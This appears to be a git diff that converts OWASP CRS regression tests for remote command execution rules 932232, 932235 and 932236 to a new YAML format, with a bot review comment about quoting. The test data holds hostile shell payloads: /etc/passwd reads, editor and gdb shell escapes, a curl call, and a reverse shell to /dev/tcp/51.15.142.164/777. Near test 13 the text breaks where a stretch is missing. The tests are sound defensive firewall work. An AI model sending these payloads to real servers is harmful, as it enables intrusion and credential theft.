- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Host: localhost
- Proxy-Connection: keep-alive
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?arg=%26aptitude"
- version: HTTP/1.0
- output:
- no_log_contains: id "932232"
- - test_title: 932232-5
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Host: localhost
+ Proxy-Connection: keep-alive
+ User-Agent: "OWASP CRS test agent"
+ method: GET
+ port: 80
+ uri: "/get?arg=%26aptitude"
+ version: HTTP/1.0
+ output:
+ log:
+ no_expect_ids: [932232]
+ - test_id: 5
 desc: Remote Command Execution bypass with time
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip, deflate, br
- Accept-Language: en-us,en;q=0.5
- method: GET
- port: 80
- uri: "/get?foo=time+who"
- version: HTTP/1.1
- output:
- log_contains: "id \"932232\""
- - test_title: 932232-6
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip, deflate, br
+ Accept-Language: en-us,en;q=0.5
+ method: GET
+ port: 80
+ uri: "/get?foo=time+who"
+ version: HTTP/1.1
+ output:
+ log:
+ expect_ids: [932232]
+ - test_id: 6
 desc: Remote Command Execution bypass with time negative test
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip, deflate, br
- Accept-Language: en-us,en;q=0.5
- method: GET
- port: 80
- uri: "/get?foo=time+warner"
- version: HTTP/1.1
- output:
- no_log_contains: "id \"932232\""
- - test_title: 932232-7
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip, deflate, br
+ Accept-Language: en-us,en;q=0.5
+ method: GET
+ port: 80
+ uri: "/get?foo=time+warner"
+ version: HTTP/1.1
+ output:
+ log:
+ no_expect_ids: [932232]
+ - test_id: 7
 desc: Remote Command Injection test for BB finding 935E1D91 - time evasion attempt
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip, deflate, br
- Accept-Language: en-us,en;q=0.5
- method: GET
- port: 80
- uri: "/get?foo=ti''me+who"
- version: HTTP/1.1
- output:
- log_contains: "id \"932232\""
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip, deflate, br
+ Accept-Language: en-us,en;q=0.5
+ method: GET
+ port: 80
+ uri: "/get?foo=ti''me+who"
+ version: HTTP/1.1
+ output:
+ log:
+ expect_ids: [932232]
diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932235.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932235.yaml
index ed96bb847..4ae77be63 100644
--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932235.yaml
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932235.yaml
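Review bot: The `desc` scalars in the 932232 hunk are quoted inconsistently — tests 1–4 use double-quoted strings while tests 5–7 (`desc: Remote Command Execution bypass with time`, the `negative test` variant and `desc: Remote Command Injection test for BB finding 935E1D91 - time evasion attempt`) are plain scalars. Both forms parse identically today, but since the conversion touches every test entry anyway it is the natural moment to settle on one style, e.g. `desc: "Remote Command Execution bypass with time"`, so a future description beginning with a YAML indicator cannot silently change type. The same mix recurs in the 932236 hunk (`desc: System Command Injection (932236) from old modsec regressions`, `desc: arg value of ...` and `desc: Positive test - RCE passed in one of the args` next to quoted siblings). The 932232 hunk is complete within this view; the 932235 and 932236 hunks run past the edge of the file and are not separately reviewed.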
@@ -2,685 +2,684 @@ meta: author: "Max Leske, Esad Cetiner, Xhoenix, Franziska Bühler, azurit" description: Unix shell RCE wordlist for more than 3 characters - enabled: true - name: 932235.yaml +rule_id: 932235 tests: - - test_title: 932235-1 + - test_id: 1 desc: "4JOGUXYQ" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;find /etc -name passwd -exec cat {} + - version: HTTP/1.0 - output: - log_contains: id "932235" - - test_title: 932235-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;find /etc -name passwd -exec cat {} + + version: HTTP/1.0 + output: + log: + expect_ids: [932235] + - test_id: 2 desc: "5Y3V6UZT" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=cd /;cd etc;column passwd - version: HTTP/1.0 - output: - log_contains: id "932235" - - test_title: 932235-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=cd /;cd etc;column passwd + version: HTTP/1.0 + output: + log: + expect_ids: [932235] + - test_id: 3 desc: "6BIVX1QB" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=cd /;cd etc;bridge -b passwd - version: HTTP/1.0 - output: - log_contains: id "932235" - - test_title: 932235-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=cd /;cd etc;bridge -b passwd + version: HTTP/1.0 + output: + log: + expect_ids: [932235] + - test_id: 4 desc: "7JRJIWP8" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=cd /;cd etc;fold passwd - version: HTTP/1.0 - output: - log_contains: id "932235" - - test_title: 932235-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=cd /;cd etc;fold passwd + version: HTTP/1.0 + output: + log: + expect_ids: [932235] + - test_id: 5 desc: "ANQ9SN3S" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;flock -u / whoami - version: HTTP/1.0 - output: - log_contains: id "932235" - - test_title: 932235-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;flock -u / whoami + version: HTTP/1.0 + output: + log: + expect_ids: [932235] + - test_id: 6 desc: "AVI5619I" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;cd /;cd etc;base32 passwd|base32 -d - version: HTTP/1.0 - output: - log_contains: id "932235" - - test_title: 932235-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;cd /;cd etc;base32 passwd|base32 -d + version: HTTP/1.0 + output: + log: + expect_ids: [932235] + - test_id: 7 desc: "P6E0KY27" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=;cpulimit -l 100 -f whoami - output: - log_contains: id "932235" - - test_title: 932235-8 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=;cpulimit -l 100 -f whoami + output: + log: + expect_ids: [932235] + - test_id: 8 desc: "PDDUY935" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - cd /;cd etc;comm passwd passwd - output: - log_contains: id "932235" - - test_title: 932235-9 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + cd /;cd etc;comm passwd passwd + output: + log: + expect_ids: [932235] + - test_id: 9 desc: "PDDUY935 - but uppercase" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - CD /;CD ETC;COMM PASSWD PASSWD - output: - log_contains: id "932235" - - test_title: 932235-10 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + CD /;CD ETC;COMM PASSWD PASSWD + output: + log: + expect_ids: [932235] + - test_id: 10 desc: "FP with word comment" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get?args=comment" - version: HTTP/1.0 - output: - no_log_contains: id "932235" - - test_title: 932235-11 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + 
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get?args=comment" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932235] + - test_id: 11 desc: "FP with word performance" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get?args=;performance" - version: HTTP/1.0 - output: - no_log_contains: id "932235" - - test_title: 932235-12 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get?args=;performance" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932235] + - test_id: 12 desc: "Block execution of perf command with arguments" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: "/post" - data: "args=;perf --version" - version: HTTP/1.1 - output: - log_contains: id "932235" - - test_title: 932235-13 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: "/post" + data: "args=;perf --version" + version: HTTP/1.1 + output: + log: + expect_ids: [932235] + - test_id: 13 desc: "Block evasion using here string" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=;`cat<<$d/tcp/51.15.142.164/777" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get?cmd=d%3D%2Fdev%26%26(sh)0%3E%24d%2Ftcp%2F51.15.142.164%2F777" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get?cmd=d%3D%2Fdev%26%26(sh)0%3E%24d%2Ftcp%2F51.15.142.164%2F777" + version: HTTP/1.1 + output: + log: + expect_ids: [932236] + - test_id: 4 desc: "55O5COJ5" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;c89 -wrapper sh,-c,id . - version: HTTP/1.0 - output: - log_contains: id "932236" - - test_title: 932236-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;c89 -wrapper sh,-c,id . 
+ version: HTTP/1.0 + output: + log: + expect_ids: [932236] + - test_id: 5 desc: "55O5COJ5" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;c89 -wrapper sh,-c,curl\ google.com . - version: HTTP/1.0 - output: - log_contains: id "932236" - - test_title: 932236-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;c89 -wrapper sh,-c,curl\ google.com . + version: HTTP/1.0 + output: + log: + expect_ids: [932236] + - test_id: 6 desc: "9323HNQU - should not be detected at PL 2" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;vi dddd +silent\\ \!whoami +wq - version: HTTP/1.0 - output: - no_log_contains: id "932236" - - test_title: 932236-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;vi dddd +silent\\ \!whoami +wq + version: HTTP/1.0 + output: + log: + no_expect_ids: [932236] + - test_id: 7 desc: "9323HNQU" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: 
"/post" - data: | - code=;vim dddd +silent\\ \!whoami +wq - version: HTTP/1.0 - output: - log_contains: id "932236" - - test_title: 932236-8 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;vim dddd +silent\\ \!whoami +wq + version: HTTP/1.0 + output: + log: + expect_ids: [932236] + - test_id: 8 desc: "9323HNQU" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;ex dddd +silent\\ \!whoami +wq - version: HTTP/1.0 - output: - log_contains: id "932236" - - test_title: 932236-9 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;ex dddd +silent\\ \!whoami +wq + version: HTTP/1.0 + output: + log: + expect_ids: [932236] + - test_id: 9 desc: "9323HNQU - should not be detected at PL 2" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;vi -c:\!pwd - version: HTTP/1.0 - output: - no_log_contains: id "932236" - - test_title: 932236-10 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: 
"/post" + data: | + code=;vi -c:\!pwd + version: HTTP/1.0 + output: + log: + no_expect_ids: [932236] + - test_id: 10 desc: "9323HNQU" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;vim -c:\!pwd - version: HTTP/1.0 - output: - log_contains: id "932236" - - test_title: 932236-11 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;vim -c:\!pwd + version: HTTP/1.0 + output: + log: + expect_ids: [932236] + - test_id: 11 desc: "9323HNQU" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;ex -c:\!pwd - version: HTTP/1.0 - output: - log_contains: id "932236" - - test_title: 932236-12 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;ex -c:\!pwd + version: HTTP/1.0 + output: + log: + expect_ids: [932236] + - test_id: 12 desc: "ATFHUJVF" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;gdb -nx -ex \!whoami -ex quit - version: HTTP/1.0 - 
output: - log_contains: id "932236" - - test_title: 932236-13 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;gdb -nx -ex \!whoami -ex quit + version: HTTP/1.0 + output: + log: + expect_ids: [932236] + - test_id: 13 desc: "JW2SU88A" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=;cat /path/file.gz - output: - log_contains: id "932236" - - test_title: 932236-14 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=;cat /path/file.gz + output: + log: + expect_ids: [932236] + - test_id: 14 desc: "4JOGUXYQ" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - find /etc -name passwd -exec cat {} + - output: - log_contains: id "932236" - - test_title: 932236-15 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + find /etc -name passwd -exec cat {} + + output: + log: + expect_ids: [932236] + - 
test_id: 15 desc: "ANQ9SN3S" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=flock -u / whoami - output: - log_contains: id "932236" - - test_title: 932236-16 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=flock -u / whoami + output: + log: + expect_ids: [932236] + - test_id: 16 desc: "JW2SU88A" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=cat /path/file.gz - output: - log_contains: id "932236" - - test_title: 932236-17 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=cat /path/file.gz + output: + log: + expect_ids: [932236] + - test_id: 17 desc: "P6E0KY27" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=cpulimit -l 100 -f whoami - output: - log_contains: id "932236" - - test_title: 932236-18 + - input: + dest_addr: 127.0.0.1 
+ headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=cpulimit -l 100 -f whoami + output: + log: + expect_ids: [932236] + - test_id: 18 desc: "FP agains 'fi' without word boundary" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get?field_metatags[0][advanced][rights]=somevalue" - version: HTTP/1.0 - output: - no_log_contains: id "932236" - - test_title: 932236-19 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get?field_metatags[0][advanced][rights]=somevalue" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932236] + - test_id: 19 desc: "FP MailerUI" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get?args=MailerUI" - version: HTTP/1.0 - output: - no_log_contains: id "932236" - - test_title: 932236-20 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get?args=MailerUI" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932236] + - test_id: 20 desc: "FP tasksListView" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: 
"OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get?args=tasksListView" - version: HTTP/1.0 - output: - no_log_contains: id "932236" - - test_title: 932236-21 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get?args=tasksListView" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932236] + - test_id: 21 desc: System Command Injection (932236) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: 